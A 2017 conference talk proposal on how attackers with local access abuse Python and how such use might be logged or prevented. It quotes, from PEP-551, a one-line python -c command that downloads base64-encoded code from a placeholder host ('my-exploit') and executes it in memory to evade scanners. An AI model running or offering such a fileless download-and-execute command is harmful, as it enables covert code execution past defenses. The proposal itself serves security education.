Mentoring: The Paper Chase arrow_forward
Python and Security in Production Systems
Submitted by Abhilash Raj (@abhilashraj) on Friday, 15 September 2017
Technical level: Intermediate
Python is a powerful language with batteries included that helps beginners to get up to speed in near zero time. With so much functionality available, it is hard to control what a mailicious user can do with python on a system to not just perform malicious actions but also evade detection. For example,
python -c "import urllib.request, base64; exec(base64.b64decode( urllib.request.urlopen('http://my-exploit/py.b64') ).decode())"
Above code segment is a part of PEP-551 and demonstrates the capabilities of Python. The important point to consider in above code-segment is how easily one can fetch obfuscated(base64-encoded or encrypted) data through network, to avoid malware-scanners sniffing networks, and execute them on machine without touching the disk ever (which would bypass disk-based malware scanners too!). PEP-551 talks in more detail about what can be done to prevent it and why is that a problem.
In this talk, we will see some examples of what are some of the malicious uses of Python that makes the life of an attacker much easier. How to write a simple packet sniffer, how to write a simple
netcat application, how to fetch malicious programs through the network and execute them; this would give you an overview of what examples might look like. It will also touch very briefly on what can be done to control or log all the actions that one can do using Python so as to detect malicious usage.
This talk is not about security of applications built using Python but instead explores the power it grants to a malicious user with local access to the system.
- Difference between an interpreted language and compiled language from security standpoint
- Access control on production systems and basic concepts of malware-scanners
- Overview of useful standard library modules used in the talk
- Few examples of what can be achieved with the above mentioned modules
- Some ideas on how can these be prevented and what can be done in Python to help the situation.
Abhilash is GNU Mailman developer and is profoundly interested in systems and security. He started out in security as a grad student to solve problems of side-channel attacks in Linux and moved on to study various other types of attacks and their existing defenses looking for open problems. He got involved with GNU Mailman as a GSoC student and eventually became a member of the core development team.